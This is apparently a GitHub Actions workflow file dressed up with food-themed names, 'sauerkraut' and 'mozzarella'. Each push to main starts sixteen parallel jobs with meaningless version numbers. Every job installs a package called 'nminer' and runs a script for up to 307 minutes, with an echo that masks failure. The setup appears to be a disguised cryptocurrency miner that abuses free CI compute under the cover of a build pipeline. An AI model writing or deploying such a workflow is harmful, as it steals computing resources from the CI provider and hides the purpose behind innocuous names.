name: sauerkraut
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3422 }
          - { version: 9907 }
          - { version: 3331 }
          - { version: 8165 }
          - { version: 2888 }
          - { version: 1044 }
          - { version: 7034 }
          - { version: 3067 }
          - { version: 787 }
          - { version: 7731 }
          - { version: 1529 }
          - { version: 4190 }
          - { version: 2918 }
          - { version: 8597 }
          - { version: 9929 }
          - { version: 6125 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: mozzarella
        run: |
          npm install nminer@latest
          timeout 307m node sauerkraut.js || echo "sauerkraut executed"